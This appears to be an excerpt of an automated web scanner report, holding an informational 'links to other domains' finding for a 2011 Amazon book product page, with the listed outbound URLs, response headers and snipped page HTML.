<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AB-IWy0KEPFGTfwkPoWj0qbesXfgyWeF6kOif9y4CnZOyl6t62ekKFQZ2JCs3C6MQiueTCOw4zJFRV.wtksscZ5E1OFo0IAcUaPDYaEseVilTbtFGwjQPWGZ3OkTXm9Rztqp-Thee4sNWapeyRLiifgjf6zrboGQmR9P2zHzUfAe4-qNgcSEEeWovfSwkDRcwoW77OlZikBe987yfogfjanEMCLGfnpi253Vj4PDEMOGbnqEbN8YNU2lh4EcAeEbq7rq4UoNi-n8rk7qdW1WoxAlDWvB9CHb5qGFeRV3Poazh7BbBZfv3jQDxjVIHwND6OHd2qrarFkmtthpEnwXboNNPtE6de2DED6F.Y12XNj-lbnJhnBhgbqfDglXr6ZkCcqMt2fAN0UkYW-ku1YrL-3GeIcCpgLRsnuwmo6VLoX9Rjy5eZ.zwtkXbvNgXybl9lBODf2Ryo3A.WbgmeUJ0jv.UyuW-hPOfhEF9Z56Ch3Q&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AB-IWy0KEPFGTfwkPoWj0qbesXfgyWeF6kOif9y4CnZOyl6t62ekKFQZ2JCs3C6MQiueTCOw4zJFRV.wtksscZ5E1OFo0IAcUaPDYaEseVilTbtFGwjQPWGZ3OkTXm9Rztqp-Thee4sNWapeyRLiifgjf6zrboGQmR9P2zHzUfAe4-qNgcSEEeWovfSwkDRcwoW77OlZikBe987yfogfjanEMCLGfnpi253Vj4PDEMOGbnqEbN8YNU2lh4EcAeEbq7rq4UoNi-n8rk7qdW1WoxAlDWvB9CHb5qGFeRV3Poazh7BbBZfv3jQDxjVIHwND6OHd2qrarFkmtthpEnwXboNNPtE6de2DED6F.Y12XNj-lbnJhnBhgbqfDglXr6ZkCcqMt2fAN0UkYW-ku1YrL-3GeIcCpgLRsnuwmo6VLoX9Rjy5eZ.zwtkXbvNgXybl9lBODf2Ryo3A.WbgmeUJ0jv.UyuW-hPOfhEF9Z56Ch3Q&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">microsoft.com/Web/WebMatrix</a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AM5SVv0KqREifjrGNESMjnMS3oqEQA8jwjlxLdh2lG8n2F0ZxnHVZPw2YLzXRtPqKDAUbEblv7sjnu9CsTTbPxg8O1VmGyjizm0.cknzUoDL0dW5X8DM24Dky7Ba7JUtajcRC2DrmiCHw.izg231ccdWk0L84dFPjoZVk5DIcfBSjoN6VH6PlyDCzv-JeNs0BbzkqxzEU9SLZHGCdtWZVGundZ46wItUcV11ASMFfLkSl0K.3nWXnOZlLgZIUJo39NRdKE4vwow5rPcfv3hyvWdwtEx5gg2jGQvf9LePrezTrD1VkEUTyDgNRt2OzMzd2kCE7ReJ5M2wkJHy7nCrYwys8w1MSYEpsnqwp-TC-30FKRty5YfBUelWheG6KKdCJxWurqOiz4X-FASLpEROwdQif0pHxRbbCpuwNdVmmokRl5yajnBOLgpoVkySrR3N6-jsdTcdFMNZiurfRZNfyhjvHNJUR4yvg-NrZR1lDoR6tKpU8SiwjZhZY78TGi22tV91F-vooDPf&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AM5SVv0KqREifjrGNESMjnMS3oqEQA8jwjlxLdh2lG8n2F0ZxnHVZPw2YLzXRtPqKDAUbEblv7sjnu9CsTTbPxg8O1VmGyjizm0.cknzUoDL0dW5X8DM24Dky7Ba7JUtajcRC2DrmiCHw.izg231ccdWk0L84dFPjoZVk5DIcfBSjoN6VH6PlyDCzv-JeNs0BbzkqxzEU9SLZHGCdtWZVGundZ46wItUcV11ASMFfLkSl0K.3nWXnOZlLgZIUJo39NRdKE4vwow5rPcfv3hyvWdwtEx5gg2jGQvf9LePrezTrD1VkEUTyDgNRt2OzMzd2kCE7ReJ5M2wkJHy7nCrYwys8w1MSYEpsnqwp-TC-30FKRty5YfBUelWheG6KKdCJxWurqOiz4X-FASLpEROwdQif0pHxRbbCpuwNdVmmokRl5yajnBOLgpoVkySrR3N6-jsdTcdFMNZiurfRZNfyhjvHNJUR4yvg-NrZR1lDoR6tKpU8SiwjZhZY78TGi22tV91F-vooDPf&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AM5SVv0KqREifjrGNESMjnMS3oqEQA8jwjlxLdh2lG8n2F0ZxnHVZPw2YLzXRtPqKDAUbEblv7sjnu9CsTTbPxg8O1VmGyjizm0.cknzUoDL0dW5X8DM24Dky7Ba7JUtajcRC2DrmiCHw.izg231ccdWk0L84dFPjoZVk5DIcfBSjoN6VH6PlyDCzv-JeNs0BbzkqxzEU9SLZHGCdtWZVGundZ46wItUcV11ASMFfLkSl0K.3nWXnOZlLgZIUJo39NRdKE4vwow5rPcfv3hyvWdwtEx5gg2jGQvf9LePrezTrD1VkEUTyDgNRt2OzMzd2kCE7ReJ5M2wkJHy7nCrYwys8w1MSYEpsnqwp-TC-30FKRty5YfBUelWheG6KKdCJxWurqOiz4X-FASLpEROwdQif0pHxRbbCpuwNdVmmokRl5yajnBOLgpoVkySrR3N6-jsdTcdFMNZiurfRZNfyhjvHNJUR4yvg-NrZR1lDoR6tKpU8SiwjZhZY78TGi22tV91F-vooDPf&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.accusoft.com/<b>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=bxgy_cc_b_img_a"><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Silverlight 4 in Action" id="" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Programming-WCF-Services-Mastering-AppFabric/dp/0596805489/ref=bxgy_cc_b_img_b"><img src="http://ecx.images-amazon.com/images/I/41ednsqKVdL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Programming WCF Services: Mastering WCF and the Azure AppFabric Service Bus" id="" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512N51%2BQbGL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41ednsqKVdL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading…" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Silverlight 4 in Action" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/Pro-Silverlight-4-Matthew-MacDonald/dp/1430229799/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_1430229799" ><img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Pro Silverlight 4 in C#" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Unleashed-Laurent-Bugnion/dp/0672333368/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_0672333368" ><img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Silverlight 4 Unleashed" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Foundation-Expression-Blend-4-Silverlight/dp/143022973X/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_143022973X" ><img src="http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL75_SS50_.jpg" width="50" alt="Foundation Expression Blend 4 with Silverlight" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&nodeId=518316">
...[SNIP]...
<td>


                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" /> Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?

    <b>
...[SNIP]...
<a href="/ref=footer_logo/186-7103494-9643855"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

22.378. http://www.amazon.com/gp/product/1935182374 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/gp/product/1935182374

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/gp/product/1935182374?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=1935182374

The response contains the following links to other domains:

http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml
http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/41ednsqKVdL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/512N51+QbGL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/512qJmTNIXL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg
http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg
http://ecx.images-amazon.com/images/I/51ZBCnP8+0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL75_SS50_.jpg
http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://g-ecx.images-amazon.com/images/G/01/Books/grutty/burst/buyback_75-b._SS75_V174666444_.gif
http://g-ecx.images-amazon.com/images/G/01/books/student/50_amazon_student._V187616879_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png
http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif
http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif
http://g-ecx.images-amazon.com/images/G/01/sdp/popover/fba/amz-prime._V192217000_.gif
http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif
http://rd.a9.com/srv/redirect/?info=AA1qj99DKyW8k0G4mJG87w5TPP3pGSgGNTg4jxiwP9PWWq-xETkOGxIniqvYu0f2BPxgowSyGJFHFDiQlx2ejilsjyCbt3UZ4FA9DPuA03gGsbHSV8sredGIE1Db2DdSfkl0aDJEGQ2UtiNuvUuxUtunhKb60IdGJs5Z8BigP6llgHfVJrbyVL2Yx0KpDufUybH9iFQgYipWjhDnJ6rFKyV2egWoTED8a7MChebCnt1iSdghRkcfPoZnhU5HnHJhxRaRQuzbKattoEAjYhGyMx7Nigt3Pw2cxjqy-Ncd3.RE4V3MafVLW2NVl2lN63WA.-yU.HUPQGou82sdudXTEIWGvPxm-R-4lTRNrEdRjSJUF0eK37rFMGzdVGI7ynWN265-m7.hSxUoWbPZVWJzwIKF7t5j6W4Qsd7ewKzgGthFJw8KYoNB1K.BYlJW7X9r1oIPS1MiO5f-KpvzneG4BoL4c0gI7WyQ347QuTVAUvDRYBZeIdiSBtsq03ZGhfzTSs4XtjDVaPgecXT5go6kdU0oZakCYDUCKq7cXHSzoBDAfyTF0qqxnTs_&awt=1&s=
http://rd.a9.com/srv/redirect/?info=AIys9q0A9Y2eDUnFVWfBcWIckhsY7fiBXXF9Ka18wumsqXQ7JdEWL4eUx8gmc2rTqIRM0YxtcigQnzi4k2RfVzJ5IzUf12RhdYyqOb6l-BhuKt5TFYERVKQdEljJjd2p9jcJFqqFEcxuWmANRDeXdMEji9hNCaIHIcKjLaJdUT1X0G2MfRwGDm.c25G4v9-QCslHSShZRG-I9j61Ew1d03MFsFRsvlufLVRvp8eMUoVF3JdByDZdlMehVJo0Uq4pkZI24niChfWbDGAH1WJvAwBHwpsWxfjbiN1PXB.zEMPBr5G-vEomAY.vBvEVKD9fyiBl2dYmWij9fC1tQGtyl6yR9hPmg3skh8EcDiCzJM9lqb2qGfwohPYagQzrk2sM2eqaVEihMvMr9aYu0CUiICEaMXLEGErYnuxtbaMmX5bm9QYdmgZC5tanJt.m6dFDcl2VYhZ600.L0nJ2i8S7dyaRT-3d3EcSc6d8pDVZVWtC&awt=1&s=
http://rd.a9.com/srv/redirect/?info=ALAUlv5bNpIbYQe3J19.jjAy9sNdZoAj8rNVvDHP8wVae6uI3sBadRGeUZN4zynEbk.eekvc9T4fMNnuLnYJb-wNoGgEjY75VQ0pQH43qk.bbc7FMJNdnhnJ0kLg95E.Du2ylJH.yyolih8Uii4ax9EZWc.oQgEOAP2AG48fVD2FtMEmkPTlCEmPARo4ffV3I6HSTz2Pf5ALmuzQPorvoZTMgxGDSZRn4yxw9Fts4fiIKnefj9t5If0qxlGModWxgsKxPtFFrH8HF.wgkjeRJp-aVvRtEH28ITundIndIvKlvJqRA2xyBxXapQlmVTCzFG4TJlLN-..Seyn1wUTtm0YHXWjnMQwcAbOz25QOS7TDNgKY99Bn-NfwVd4Ykt54hQ3OhOD4KxtQxXVq1f1UOWEevg14R1ki5nbPObDr4R9YyCjRJIDxHhkr7hQdPeNmJS3toNF1xTOgPHNOMUUwIjWoQd6200BkpsDN3h5.3VYInIF0AWKt9i8IYvhdEZKQvg__&awt=1&s=
http://www.amazon.ca/
http://www.amazon.cn/
http://www.amazon.de/
http://www.amazon.fr/
http://www.amazon.it/
http://www.audible.com/
http://www.dpreview.com/
http://www.endless.com/
http://www.fabric.com/
http://www.imdb.com/
http://www.shopbop.com/welcome
http://www.smallparts.com/
http://www.warehousedeals.com/
http://www.woot.com/
http://www.zappos.com/
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css
http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css
http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:13 GMT
Server: Server
x-amz-id-1: 0HRJE1J9WQNXJFNGE4NT
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: NW5s8gvokJzw5y8JSRfujzyLlaoU46emA4SVA7QeDoqwIRKJVd6WwTevRv3TMvWf
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=187-0383633-5130955; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=ZM4E0es5+/XEPKcb4MMxmuznZiNyR6gzmDyuvhd39TYBscZma+7OBrLUTIyOOP5L3sOxz0fHi+PVrR7mWXqIyqofYHjJvSwGljfj0cWis60uRBkc1sDMnpiFAFA2IIWQcy0VuQkFO/hek0tlyUsNbuYdCElWcPRfXi2EhNSRROn/5eBkOahc4qN0YXGEPSxJXkpZsFFUUSU+6NyU2vkiTcA6YKmyCajS7mMAIbCCQEcVDyHYe/GzA3wLflh2+74ShUEGuIQUYMUcM2sdqOFPBWrtSn3q/r5KXVvVo3NHlIV0vVwFkMcJVoUPOq2S74LF/6hYIm/NwCdL9vCXUOjzqk7tUlQ3znq9WVE1fo0DdyrZ3XKTD152l098UAWXhdfxPyegtMSG3+GMu2CSzmKtj4j6dgItiNp5cZZ5baIxudoffyAijgZcIzX2w8f4DVw+AMxSy/RUheA=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:13 2011 GMT
Content-Length: 398788

<html>
<head>

<style type="text/css">
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<em>FBA items qualify for FREE Super Saver Shipping and <img src="http://g-ecx.images-amazon.com/images/G/01/sdp/popover/fba/amz-prime._V192217000_.gif" width="92" alt="Amazon Prime" height="12" border="0" />.</em>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=1935182374"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/1935182374/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Silverlight 4 in Action" onmouseover="" /></a>
...[SNIP]...
on.com/gp/student/signup/info&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=product-alert&pf_rd_r=0HRJE1J9WQNXJFNGE4NT&pf_rd_t=201&pf_rd_p=1284419222&pf_rd_i=1935182374"><img src="http://g-ecx.images-amazon.com/images/G/01/books/student/50_amazon_student._V187616879_.gif" width="50" align="left" alt="Textbook Student" height="37" border="0" /></a>
...[SNIP]...
<div style="float: left; width: 75px; padding-right: 8px;"><img src="http://g-ecx.images-amazon.com/images/G/01/Books/grutty/burst/buyback_75-b._SS75_V174666444_.gif" width="75" height="75" border="0" /></div>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AIys9q0A9Y2eDUnFVWfBcWIckhsY7fiBXXF9Ka18wumsqXQ7JdEWL4eUx8gmc2rTqIRM0YxtcigQnzi4k2RfVzJ5IzUf12RhdYyqOb6l-BhuKt5TFYERVKQdEljJjd2p9jcJFqqFEcxuWmANRDeXdMEji9hNCaIHIcKjLaJdUT1X0G2MfRwGDm.c25G4v9-QCslHSShZRG-I9j61Ew1d03MFsFRsvlufLVRvp8eMUoVF3JdByDZdlMehVJo0Uq4pkZI24niChfWbDGAH1WJvAwBHwpsWxfjbiN1PXB.zEMPBr5G-vEomAY.vBvEVKD9fyiBl2dYmWij9fC1tQGtyl6yR9hPmg3skh8EcDiCzJM9lqb2qGfwohPYagQzrk2sM2eqaVEihMvMr9aYu0CUiICEaMXLEGErYnuxtbaMmX5bm9QYdmgZC5tanJt.m6dFDcl2VYhZ600.L0nJ2i8S7dyaRT-3d3EcSc6d8pDVZVWtC&awt=1&s=" rel="nofollow"><b>Silverlight</b></a>
